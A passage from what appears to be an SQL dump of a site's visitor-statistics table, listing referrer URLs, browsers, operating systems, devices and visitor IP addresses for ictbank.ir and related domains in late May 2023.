(33341,'2023-05-26','https://ictbank.ir/productmatrix/admin/index.php','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.237.184','000',0,19,0),
(33342,'2023-05-26','http://design-arena.ir','Unknown','iOS','Unknown','tablet','iPad','','192.42.116.196','000',0,1,0),
(33343,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.164.5.167','000',0,1,0),
(33344,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33345,'2023-05-26','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(33346,'2023-05-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.71.236.8','000',0,1,0),
(33347,'2023-05-26','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(33348,'2023-05-26','http://ictbank.ir','Chrome','Windows','84.0.0.0','desktop','Unknown','','144.172.118.36','000',0,1,0),
(33349,'2023-05-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33350,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(33351,'2023-05-26','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(33352,'2023-05-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,1,0),
(33353,'2023-05-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(33354,'2023-05-27','https://ictbank.ir/blog','Chrome','OS X','104.0.0.0','desktop','Macintosh','','18.234.53.202','000',0,2,0),
(33355,'2023-05-27','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,2,0),
(33356,'2023-05-27','https://ictbank.ir/blog','Firefox','Windows','83.0','desktop','Unknown','','195.154.173.28','000',0,11,0),
(33357,'2023-05-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(33358,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33359,'2023-05-27','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.154.4','000',0,2,0),
(33360,'2023-05-27','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','199.45.155.4','000',0,2,0),
(33361,'2023-05-27','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(33362,'2023-05-27','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','38.110.46.2','000',0,2,0),
(33363,'2023-05-27','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','171.67.71.144','000',0,2,0),
(33364,'2023-05-27','https://ictbank.ir/blog','Firefox','Linux','110.0','desktop','Unknown','','43.248.128.82','000',0,2,0),
(33365,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.65','000',0,1,0),
(33366,'2023-05-27','http://ictbank.ir','Chrome','Windows','81.0.0.0','desktop','Unknown','','38.97.116.244','000',0,1,0),
(33367,'2023-05-27','https://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','103.43.19.38','000',0,1,0),
(33368,'2023-05-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(33369,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33370,'2023-05-27','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.111.40.96','000',0,1,0),
(33371,'2023-05-27','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.32','000',0,2,0),
(33372,'2023-05-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,2,0),
(33373,'2023-05-27','https://ictbank.ir/productmatrix/admin/popup.php?pid=reports.companies_brands.map','Chrome','OS X','113.0.0.0','desktop','Macintosh','','54.202.172.180','000',0,19,0),
(33374,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.47','000',0,1,0),
(33375,'2023-05-27','https://45.92.94.221/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','174.138.187.154','000',0,1,0),
(33376,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,1,0),
(33377,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(33378,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','95.214.27.212','000',0,5,0),
(33379,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33380,'2023-05-27','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.191.27','000',0,2,0),
(33381,'2023-05-27','http://ictbank.ir/blog/about-me/','Firefox','Linux','102.0','desktop','Unknown','','37.139.53.191','000',0,3,0),
(33382,'2023-05-27','https://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.150.216','000',0,1,0),
(33383,'2023-05-27','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','5.78.75.106','000',0,1,0),
(33384,'2023-05-27','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.162.95','000',0,9,0),
(33385,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33386,'2023-05-27','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.160.36','000',0,71,0),
(33387,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33388,'2023-05-27','https://ictbank.ir/hooman/admin/index.php?pid=students&func=add','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.176.112','000',0,18,0),
(33389,'2023-05-27','https://ictbank.ir/productmatrix/admin/index.php?pid=raw_materials','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.237.184','000',0,8,0),
(33390,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.88.146','000',0,1,0),
(33391,'2023-05-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(33392,'2023-05-27','https://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','178.131.137.100','000',0,1,0),
(33393,'2023-05-27','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33394,'2023-05-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.184.155.121','000',0,1,0),
(33395,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33396,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','207.244.242.104','000',0,127,0),
(33397,'2023-05-27','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','193.37.255.114','000',0,3,0),
(33398,'2023-05-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(33399,'2023-05-27','https://ictbank.ir/blog','Opera','Windows','12.0','desktop','Unknown','','54.217.83.13','000',0,2,0),
(33400,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','27.0.0.0','desktop','Unknown','','99.81.216.206','000',0,1,0),
(33401,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','192.42.116.202','000',0,1,0),
(33402,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','192.42.116.191','000',0,1,0),
(33403,'2023-05-27','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(33404,'2023-05-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33405,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33406,'2023-05-28','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(33407,'2023-05-28','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33408,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33409,'2023-05-28','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.189','000',0,1,0),
(33410,'2023-05-28','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(33411,'2023-05-28','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(33412,'2023-05-28','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.70','000',0,2,0),
(33413,'2023-05-28','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(33414,'2023-05-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.103.178','000',0,1,0),
(33415,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,4,0),
(33416,'2023-05-28','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33417,'2023-05-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.133.44.232','000',0,1,0),
(33418,'2023-05-28','https://ictbank.ir/productmatrix/admin/index.php','Chrome','OS X','113.0.0.0','desktop','Macintosh','','54.202.172.180','000',0,10,0),
(33419,'2023-05-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.136.145','000',0,1,0),
(33420,'2023-05-28','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','2.179.50.141','000',0,38,0),
(33421,'2023-05-28','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','113.0.0.0','desktop','Unknown','','51.81.208.59','000',0,2,0),
(33422,'2023-05-28','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33423,'2023-05-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','87.247.244.225','000',0,1,0),
(33424,'2023-05-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','110.39.55.29','000',0,1,0),
(33425,'2023-05-28','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.2','000',0,2,0),
(33426,'2023-05-28','http://design-arena.ir','Firefox','OS X','33.0','desktop','Macintosh','','185.100.87.41','000',0,1,0),
(33427,'2023-05-28','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.40','000',0,33,0),
(33428,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33429,'2023-05-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.221.244','000',0,1,0),
(33430,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33431,'2023-05-28','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33432,'2023-05-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.132.191','000',0,1,0),
(33433,'2023-05-28','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,1,0),
(33434,'2023-05-28','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(33435,'2023-05-28','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(33436,'2023-05-28','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(33437,'2023-05-28','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(33438,'2023-05-28','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.48.154','000',0,1,0),
(33439,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,2,0),
(33440,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(33441,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,2,0),
(33442,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.32.227','000',0,1,0),
(33443,'2023-05-28','https://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,1,0),
(33444,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,1,0),
(33445,'2023-05-28','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(33446,'2023-05-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33447,'2023-05-28','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.200','000',0,1,0),
(33448,'2023-05-28','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.94','000',0,1,0),
(33449,'2023-05-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','155.133.132.65','000',0,1,0),
(33450,'2023-05-29','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.40','000',0,6,0),
(33451,'2023-05-29','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(33452,'2023-05-29','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(33453,'2023-05-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,6,0),
(33454,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.169','000',0,1,0),
(33455,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.136','000',0,1,0),
(33456,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.147','000',0,1,0),
(33457,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.141','000',0,1,0),
(33458,'2023-05-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','80.94.95.2','000',0,2,0),
(33459,'2023-05-29','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','37.139.53.191','000',0,2,0),
(33460,'2023-05-29','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,75,0),
(33461,'2023-05-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(33462,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33463,'2023-05-29','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.90.156','000',0,1,0),
(33464,'2023-05-29','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.89.193.162','000',0,1,0),
(33465,'2023-05-29','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.87.97','000',0,1,0),
(33466,'2023-05-29','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.189','000',0,8,0),
(33467,'2023-05-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.86.82.173','000',0,1,0),
(33468,'2023-05-29','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(33469,'2023-05-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(33470,'2023-05-29','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','52.51.218.89','000',0,1,0),
(33471,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33472,'2023-05-29','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.238.36.25','000',0,58,0),
(33473,'2023-05-29','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.48','000',0,2,0),
(33474,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','144.126.215.152','000',0,1,0),
(33475,'2023-05-29','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','186.121.242.99','000',0,126,0),
(33476,'2023-05-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(33477,'2023-05-29','https://ictbank.ir/productmatrix/admin/index.php?pid=raw_materials','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.237.184','000',0,3,0),
(33478,'2023-05-29','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','47.92.24.158','000',0,2,0),
(33479,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.207.110','000',0,1,0),
(33480,'2023-05-29','https://ictbank.ir/blog','Chrome','Windows','52.0.0.0','desktop','Unknown','','3.81.61.61','000',0,2,0),
(33481,'2023-05-29','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,2,0),
(33482,'2023-05-29','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.99.156','000',0,1,0),
(33483,'2023-05-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.2.210','000',0,1,0),
(33484,'2023-05-29','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.137.60','000',0,1,0),
(33485,'2023-05-29','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','122.160.61.100','000',0,1,0),
(33486,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,3,0),
(33487,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,6,0),
(33488,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33489,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.174','000',0,6,0),
(33490,'2023-05-30','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(33491,'2023-05-30','https://yandex.ru/','Edge','Windows','113.0.0.0','desktop','Unknown','','95.161.221.103','000',0,1,0),
(33492,'2023-05-30','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.26','000',0,1,0),
(33493,'2023-05-30','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.11','000',0,1,0),
(33494,'2023-05-30','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.97','000',0,1,0),
(33495,'2023-05-30','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.80','000',0,1,0),
(33496,'2023-05-30','https://yandex.ru/','Edge','Windows','113.0.0.0','desktop','Unknown','','95.161.239.129','000',0,1,0),
(33497,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,6,0),
(33498,'2023-05-30','https://ictbank.ir/productmatrix/admin/index.php?pid=raw_materials','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,30,0),
(33499,'2023-05-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,2,0),
(33500,'2023-05-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(33501,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.27','000',0,1,0),
(33502,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','157.245.156.0','000',0,2,0),
(33503,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33504,'2023-05-30','https://www.google.com/','Chrome','Windows','113.0.0.0','desktop','Unknown','','92.45.121.2','000',0,1,0),
(33505,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','27.0.0.0','desktop','Unknown','','54.217.83.13','000',0,1,0),
(33506,'2023-05-30','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.93','000',0,1,0),
(33507,'2023-05-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(33508,'2023-05-30','https://www.google.com/','Chrome','Linux','113.0.0.0','desktop','Unknown','','103.214.131.18','000',0,1,0),
(33509,'2023-05-30','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(33510,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,6,0),
(33511,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,1,0),
(33512,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33513,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,8,0),
(33514,'2023-05-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(33515,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(33516,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,6,0),
(33517,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33518,'2023-05-30','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','159.65.152.123','000',0,6,0),
(33519,'2023-05-30','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','37.59.53.82','000',0,1,0),
(33520,'2023-05-30','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','142.93.48.245','000',0,1,0),
(33521,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.125.197','000',0,1,0),
(33522,'2023-05-30','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(33523,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.143.149','000',0,1,0),
(33524,'2023-05-30','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','185.233.19.44','000',0,2,0),
(33525,'2023-05-30','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','31.7.105.94','000',0,89,0),
(33526,'2023-05-30','https://ictbank.ir/blog','Safari','iOS','13.0','mobile:smart','iPhone','','113.201.148.222','000',0,1,0),
(33527,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33528,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.138','000',0,1,0),
(33529,'2023-05-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(33530,'2023-05-30','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(33531,'2023-05-30','https://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','193.32.87.49','000',0,1,0),
(33532,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.89.22.139','000',0,48,0),
(33533,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.183.60','000',0,1,0),
(33534,'2023-05-30','https://ictbank.ir/blog','Samsung Internet','Android','3.0','mobile:smart','Galaxy J3 (2016)','','93.110.40.74','000',0,1,0),
(33535,'2023-05-30','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','44.192.64.123','000',0,5,0),
(33537,'2023-05-30','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,2,0),
(33538,'2023-05-30','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','183.91.78.211','000',0,1,0),
(33539,'2023-05-30','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','107.191.102.204','000',0,1,0),
(33540,'2023-05-30','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','162.144.85.198','000',0,6,0),
(33541,'2023-05-30','https://ictbank.ir/productmatrix/admin/index.php?pid=reports','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.244.167','000',0,8,0),
(33542,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','23.146.240.163','000',0,2,0),
(33543,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','165.22.178.154','000',0,3,0),
(33544,'2023-05-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.32','000',0,1,0),
(33545,'2023-05-30','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','58.251.94.154','000',0,1,0),
(33546,'2023-05-31','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33547,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(33548,'2023-05-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','2.57.122.202','000',0,2,0),
(33549,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,12,0),
(33550,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(33551,'2023-05-31','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33552,'2023-05-31','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.31','000',0,32,0),
(33553,'2023-05-31','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','103.28.156.145','000',0,31,0),
(33554,'2023-05-31','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.26','000',0,1,0),
(33555,'2023-05-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.215.253.15','000',0,1,0),
(33556,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33557,'2023-05-31','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','210.18.140.142','000',0,52,0),
(33558,'2023-05-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.84.109','000',0,1,0),
(33559,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
